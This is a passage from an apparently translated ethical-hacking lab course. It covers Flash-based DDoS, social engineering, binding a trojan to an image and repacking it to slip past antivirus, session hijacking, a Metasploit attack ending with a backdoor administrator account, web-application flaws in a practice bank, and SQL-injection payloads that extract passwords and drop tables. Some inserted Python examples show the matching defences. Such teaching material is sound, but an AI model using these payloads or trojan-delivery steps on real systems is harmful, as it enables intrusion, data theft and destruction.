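EXPECTED = {"192.168.1.0"}
INJECTED = build_rip_v1_response([("192.168.5.0", 1)])

if __name__ == "__main__":
    print(audit_rip_update("192.168.1.51", INJECTED, TRUSTED, EXPECTED))
```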

    Lab 3: DDoS using Flash

    Besides attacking directly through protocols such as RIP, OSPF, ARP and so on, a hacker can also upload Flash files to forums; when a user plays the Flash file (it may be a video clip) it simultaneously sends HTTP POST requests to the victim. So if the Flash file is uploaded to many forums and many people watch it at the same time, the servers hosting the file unwittingly launch a DoS attack on the victim server.

    We use the Flash file on the CD (Module 8), run it in Internet Explorer, and analyse it with the WebScarab proxy.


    The Flash file opens a great many Internet Explorer windows, and each of them sends an HTTP POST to the victim server.


    Lesson 7:

    Social Engineering

    I/ Introduction

    Social Engineering is a technique many hackers use in their intrusions into networks and computer systems. It is one of the most effective methods of stealing passwords and information and attacking systems.

    Below is the true story of one of the most famous hackers in the world of the last few years, Kevin Mitnick (USA, once sentenced to 8 years in prison for attacking computer systems), a leading expert in Social Engineering. Planning an attack on company X, Kevin used this skill to dig up information about the general director and one of his assistants. Taking advantage of a time when both were away on business, he used a fake Caller ID, imitated the assistant's voice and called the company's network administrator, asking for the general director's system login password to be sent because the director had forgotten it. The administrator checked a few details about the "assistant", but Kevin had the information and the shrewdness to answer. The result was that Kevin obtained the password and took control of company X's entire network.

    Another form of deception: one bad day you receive a phone call, and on the other end is a sweet voice: "Hello sir, the service you are using with our company is currently having a problem with your account. Please send us your account details urgently so that we can fix it." At first hearing it sounds like a crude scam, but the success rate is very high, especially when the voice is as charming as the operators of the 1080 hotline! A similar trick is the "Fake Email Login" technique. In principle, each time we log in to a mailbox we have to enter our account details, username and password, and send them to the mail server for processing. Exploiting this, hackers design fake login pages (Fake Login) so that the details are sent to them instead.

    In short, Social Engineering techniques are varied and plentiful, and also extremely dangerous because of their effectiveness and prevalence. The technique does not require much technical skill; it may involve no pure technology at all (non-technical). A hacker can carry it out by letter, e-mail, telephone, face-to-face contact, through acquaintances and personal relationships... to lure users into unintentionally disclosing information. In Vietnam this technique is still fairly new, so it is not unusual for people to be fooled easily. For example, last year a whole series of MU Global gamers lost all their (virtual) property after naively entering their account details in a hacker's e-mail impersonating the MU admin!

    (Quoted)

    II/ Labs:

    Lab 1: Sending an anonymous email with a Trojan attached


    To carry out this lab we use the Mini-binder program to bind the trojan file to an image and change its icon, and the Outlook program to send the anonymous email.

    To bind the image file and the trojan file, first create a trojan file, then take an image file and any .ico file to bind with it.

    We use the command MMB 60.ico svchost.exe cathu.jpg trojanhao.exe to bind the trojan svchost.exe with cathu.jpg, using 60.ico as the icon.

    Next, we compress the new trojan file with WinRAR several times to evade anti-virus programs (this depends on the anti-virus version; most trojans do not get past these programs) and change the Outlook account information.


    Go to Tool > Option > Mail setup > View Account, select the account to change, and change the Your Name and E-mail Address fields.

    Next, attach the file and send the email. In this lab the author sends to the email address [email protected], then checks the mailbox to see whether the mail has arrived.


    Lesson 8:

    Session Hijacking

    I/ Introduction:

    As we know from sniffing (eavesdropping on the network), a hacker can capture any information that is not encrypted, or can fake a CA to obtain information from HTTPS traffic; now we add one more technique, session hijacking. To carry out this lab we first have to use ARP spoofing, then use the T-sight or Hunt software to take over the session from the victim machine.

    II/ Performing the lab

    In this lab the author uses VMware, with the physical machine as the TELNET and SSH test target. Of the two remaining machines, one runs Windows 2000 (with the T-sight tool pre-installed) and one runs Linux for testing SSH.

    Installing the software is quite easy; you need to add the driver component and move to the 192.168.200.0/24 IP range, because the Trial version is being used.


    After installation, configure machine 192.168.200.1 to allow other machines to telnet in, and telnet from machine 192.168.200.2 to machine 192.168.200.1.

    With the data captured from machine 192.168.200.2, use the Take Over feature of the T-sight tool to take the session.


    Once the session has been taken, the Telnet machine's session shows Lost connection, and the user in this case has no way of knowing what caused the Lost Connection. Now start the SSH service on the Linux machine with the service sshd command and test session hijacking against SSH traffic.


    Lesson 9:

    Hacking Web Server

    I/ Introduction:

    Usually, to hack a Web Server, a hacker first has to find out which operating system the Web Server is running and which services are running on it. Common operating systems are Win 2000 Server, Win 2003 Server, Redhat and so on, and the services include Apache, IIS, FTP Server and so on. If one of the operating system's services or another service has a flaw, that can lead to loss of control of the system. In the exercises of this section, the author presents an operating system flaw, DCOM, and application flaws in Serv-U and Apache (FTP Server). Through these flaws, we can take complete control of the victim machine.

    II/ Performing the lab

    Lab 1: Attacking a Win 2003 Web Server (Apache flaw)

    To find out whether the system's server has the flaw, we use scanning software to check (this was covered in the scanning lesson).


    We see no information about the FTP Server here, because Retina can only identify Microsoft services and common services. Less common services are shown only as an open port. In this case we see port 21 open.

    We use Metasploit to exploit the Apache flaw and obtain a console.

    Rank Vulnerability Name Count

    1. echo service 1

    2. ASN.1 Vulnerability Could Allow Code Execution 1

    3. Windows Cumulative Patch 835732 Remote 1

    4. Null Session 1

    5. No Remote Registry Access Available 1

    6. telnet service 1

    7. DCOM Enabled 1

    8. Windows RPC Cumulative Patch 828741 Remote 1

    9. Windows RPC DCOM interface buffer overflow 1

    10. Windows RPC DCOM multiple vulnerabilities 1

    11. Apache 1.3.27 0x1A Character Logging DoS 1

    12. Apache 1.3.27 HTDigest Command Execution 1

    13. Apache mod_alias and mod_rewrite Buffer Overflow 1

    14. ApacheBench multiple buffer overflows 1

    15. HTTP TRACE method supported 1


    Now we will find a way to Remote Desktop into machine 192.168.200.1. First create a user and add this user to the admin group with the commands:

    Net user vsichao vsichao /add
    // add the user

    Net localgroup Administrators vsichao /add
    // put the user into the Administrators group

    We can check again with the Net user command to see whether our user has admin rights yet.

    Next, we try to Remote Desktop into the machine with the command mstsc /v 192.168.200.6. If that does not work, we use the Openrdp.vbs file to open Remote Desktop, using the Cisco TFTP Server program to push this file to the victim server.

    Use the tftp command on the victim machine to fetch the file


    Adding the user and elevating it to Administrator.

    Remote Desktop with the user cehclass succeeds, so we have full control of the victim machine.


    Lab 2: Exploiting the Serv-U application flaw

    As in the lab above, we use nmap to determine the Serv-U version and use Metasploit to attack it.


    Lesson 10:

    WEB APPLICATION HACKING

    I/ Introduction:

    Web applications normally use the input data in HTTP requests (or in files) to determine the response. An attacker can modify any part of an HTTP request, including the URL, query string, headers, cookies, form fields and even hidden fields, to bypass security mechanisms. Common attacks of this kind include:

    - Running arbitrary system commands

    - Cross site scripting

    - Buffer overflow

    - Format string attacks

    - SQL injection

    - Cookie poisoning

    - Modifying hidden fields

    In this exercise we try to exploit Cross Site Scripting, Format string, Cookie Manipulation and Authorization Failure vulnerabilities.

    II/ Labs

    Lab 1: Cross Site Scripting

    First log in with username jv and password jv789 and choose the post message function. Then post a script into the message text field.


    Then submit this post containing the script. Press F5 to refresh the browser and the script's effect appears.

    At this point the victim's browser unwittingly runs the script that the user posted to the server. Using such a script, an attacker can steal the victim's cookie and log in to the system.

    Lab 2: Insufficient Data Validation

    In this lab, when transferring money from one account to another, the amount parameter must always be greater than 0. However, in some cases a hacker can change this number to a negative value using an HTTP proxy program. This can harm the finances of the HackmeBank bank.

    We try a transfer with Amount 100 from any account to another account.

    The result is successful. We transfer once more, but with the value -100. This time the transfer fails, because of a check on the client side.


    Now we use WebScarab as an HTTP proxy and change the parameter that is POSTed to the server.

    The result returned from the server shows that the transfer still succeeded.


    Checking under Transaction, we see the transfer has been recorded.

    Lab 3: Cookie Manipulation

    During login, we see in the cookie a parameter CookieloginAttempts; this parameter is used to lock the session when someone keeps trying to log in with a wrong or unknown password. It counts down from 5 to 0, and when it reaches 0 the session is locked. We can use WebScarab to change this parameter and avoid having the server lock the session.


    Lab 4: Authorization Failure

    First we look at the accounts of user jc (password jc789).

    We see the account numbers 5204320422040005, 5204320422040006, 5204320422040007 and 5204320422040008. User jc can only manage the accounts with the numbers above. Now pay attention to the URL when using the View Transaction feature.


    We replace the parameter 5204320422040005 with 5204320422040004 (an account that does not belong to user jc). The web site therefore has an authorization flaw.
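The server-side checks whose absence Labs 1 to 4 above demonstrate, as an added example modelled on HackmeBank but not its actual code: output escaping and an HttpOnly session cookie (Lab 1), amount validation on the server (Lab 2), a login-attempt counter kept on the server rather than in a cookie (Lab 3), and ownership checks on account numbers taken from the request (Lab 4). The Bank class, its methods and the sample data are constructed for this illustration.

```python
import html
from dataclasses import dataclass, field

# Added example modelled on HackmeBank, not its actual code. Everything
# below (class, method names, sample users and accounts) is constructed.

MAX_LOGIN_ATTEMPTS = 5      # the lab's loginAttempts cookie counts from 5 down to 0


@dataclass
class Bank:
    passwords: dict                     # username -> password
    owners: dict                        # account number -> owning username
    balances: dict                      # account number -> balance
    failed_logins: dict = field(default_factory=dict)   # server side, never in a cookie
    transactions: list = field(default_factory=list)
    messages: list = field(default_factory=list)

    def login(self, username, password):
        # Lab 3: the counter lives on the server, so editing a cookie cannot reset it
        if self.failed_logins.get(username, 0) >= MAX_LOGIN_ATTEMPTS:
            return "locked"
        if self.passwords.get(username) != password:
            self.failed_logins[username] = self.failed_logins.get(username, 0) + 1
            return "denied"
        self.failed_logins[username] = 0
        return "ok"

    def transfer(self, username, src, dst, amount):
        # Lab 2: validate on the server; the client-side check is bypassed with a proxy
        if type(amount) is not int or amount <= 0:
            return "invalid_amount"
        # Lab 4: the caller must own the source account named in the request
        if self.owners.get(src) != username:
            return "forbidden"
        if dst not in self.balances:
            return "unknown_account"
        if self.balances[src] < amount:
            return "insufficient_funds"
        self.balances[src] -= amount
        self.balances[dst] += amount
        self.transactions.append((username, src, dst, amount))
        return "ok"

    def view_transactions(self, username, account):
        # Lab 4: an account number taken from the URL proves nothing about ownership
        if self.owners.get(account) != username:
            return None
        return [t for t in self.transactions if account in (t[1], t[2])]

    def post_message(self, username, text):
        self.messages.append((username, text))     # store raw, escape when rendering

    def render_messages(self):
        # Lab 1: escape on output so a posted <script> is displayed, not executed
        return "\n".join(f"<p><b>{html.escape(u)}</b>: {html.escape(t)}</p>"
                         for u, t in self.messages)


def session_cookie_header(session_id):
    # HttpOnly hides the session id from document.cookie, which is what a
    # cookie-stealing script reads; Secure keeps it off plaintext HTTP.
    return f"Set-Cookie: session={session_id}; HttpOnly; Secure; SameSite=Lax"


def make_sample_bank():
    """Constructed data: jc owns ...0005 to ...0008 as in the lab; ...0004 is someone else's."""
    accounts = {"5204320422040004": "jv", "5204320422040005": "jc",
                "5204320422040006": "jc", "5204320422040007": "jc",
                "5204320422040008": "jc"}
    return Bank(passwords={"jc": "jc789", "jv": "jv789"}, owners=accounts,
                balances={acct: 1000 for acct in accounts})
```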


    Lesson 11:

    SQL INJECTION

    I/ Introduction to SQL Injection:

    This attack technique takes advantage of flaws in the application (input characters from the user are not checked carefully). It is carried out by adding code to SQL statements or queries (through text boxes) before they are passed to the web application for processing; the server executes them and returns the result to the browser (query results or error messages), from which attackers can gather data, run commands (in some cases) and subsequently take control of the system. Below are some basic tricks.

    1) Getting the current table and column names:

    Structure:

    Login page (or any injection page):
    username: ' having 1=1--

    Result:
    [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'VICTIM.ID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
    ---> We have obtained the table VICTIM

    Continue with:

    username: ' group by VICTIM.ID having 1=1--

    Result:
    [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'VICTIM.Vuser' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
    So we have the column Vuser

    UNION: small but effective

    Yes indeed, with it we can get almost everything.

    First a quick look at its structure:

    Login page:

    username: ' Union select [column] from [table] where [column2=...]--
    password: anything

    Example: suppose we know that the two columns username and password in table VTABLE of the victim database are VUSER and VPASS; then we do the following:


    username: ' Union select VPASS from VTABLE where VUSER='admin'-- (1)
    password: anything

    (1): Here admin is a user that you know; if you do not know one, leave it blank and it will give you the first user.

    Result:
    [Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

    If the result looks like this, you have to add more columns to the union until all the columns of table VTABLE are covered. The structure is:

    username: ' Union select VPASS,1,1,1...1,1 from VTABLE where VUSER='admin'-- (1)
    password: anything

    Keep adding ",1" until the result looks something like:

    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'tuibihackroi' to a column of data type int.

    So the password of user 'admin' is 'tuibihackroi'

    2) Getting every value of a known column in a known table

    The secret here is Not in. Its structure is as follows (using the column from the previous example): with Vuser admin we can obtain the other users

    Login Page:
    username: Union select Vuser,1,1,1,1 from Vtable where username not in (admin)

    After that we obtain one more user, and just keep adding to the Not in (e.g. Not in(admin,hacker,...)); continuing like this we get every user (and of course, afterwards, every password).

    **** To get the list of user names matching a rule of your choice, for example only users containing the word admin, use like; the structure is:

    Login Page:
    username: Union select Vuser,1,1,1,1 from Vtable where username not in (admin) like %admin%

    3) Getting all the tables and columns of the database:

    The secret is this table of the database: INFORMATION_SCHEMA.TABLES with the column TABLE_NAME (holding all the tables), and the table INFORMATION_SCHEMA.COLUMNS with the column COLUMN_NAME (holding all the columns).

    Usage with Union:

    Login page:

    username: UNION SELECT TABLE_NAME,1,1,1,1 FROM INFORMATION_SCHEMA.TABLES WHERE ...

    This way we can get all the tables; once we have a table we get all of its columns:

    Login page:
    username: UNION SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME= ... and ...

    The above are the most basic things about SQL injection that I can give you; doing it well takes a little creativity as well. I hope it helps you a little when you come across a site vulnerable to SQL injection.

    4) Without using UNION:

    If you would rather avoid Union because of its inconveniences, you can use "Convert" as an easier way of gathering info through error messages.

    Structure:

    login page:

    user: ' + convert (int,(select @@version))--

    The above is an example of getting the version; now, to get any info you like, just replace "select @@version", but remember that if it is the first time you get the info, add TOP 1.

    Example: user: ' + convert (int,(select Vpass from Vtable where Vuser='admin'))--

    Note: if this does not work for you, it may be because the + sign is not accepted; in that case replace it with %2b

    Example: user: ' %2b convert (int,(select Vpass from Vtable where Vuser='admin'))--

    5) Running SQL commands:

    To run a command you can use the ";" character

    Structure:

    login page:
    user: ' ; [command]

    Example: '; DROP TABLE VTABLE--
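An added example, not from the original text, that shows why the login-page injections above work and what stops them: the same query built by string concatenation and as a parameterised statement, run against a constructed SQLite table using the VTABLE/VUSER/VPASS names from the text (the original targets SQL Server, but the concatenation flaw is the same). Function names and the sample rows are constructed for this illustration.

```python
import sqlite3

# Added example, not from the original text: the login query built by string
# concatenation beside the parameterised version. The table and column names
# VTABLE, VUSER and VPASS follow the text; the rows are constructed sample data.


def make_demo_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE VTABLE (VUSER TEXT, VPASS TEXT)")
    conn.executemany("INSERT INTO VTABLE VALUES (?, ?)",
                     [("admin", "tuibihackroi"), ("jv", "jv789")])
    return conn


def login_vulnerable(conn, username, password):
    """Returns the matched user name, or None. The input is pasted into the
    SQL text, so a quote in it ends the string literal and whatever follows
    is parsed as SQL."""
    sql = ("SELECT VUSER FROM VTABLE WHERE VUSER = '" + username +
           "' AND VPASS = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same query with bound parameters: the driver hands the values to the
    engine separately, so they are only ever compared, never parsed."""
    row = conn.execute("SELECT VUSER FROM VTABLE WHERE VUSER = ? AND VPASS = ?",
                       (username, password)).fetchone()
    return row[0] if row else None


# The UNION payload from the text, entered as the username field. With
# concatenation the statement becomes a union whose second branch selects the
# admin password, and "--" comments out the rest of the original query.
UNION_PAYLOAD = "' UNION SELECT VPASS FROM VTABLE WHERE VUSER='admin'--"

if __name__ == "__main__":
    db = make_demo_db()
    print("concatenated:", login_vulnerable(db, UNION_PAYLOAD, "x"))   # admin's password leaks
    print("parameterised:", login_safe(db, UNION_PAYLOAD, "x"))        # None
```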

    II/ Performing the lab

    In this lab the hacker (machine 192.168.1.44) will attack the Server 2000 (192.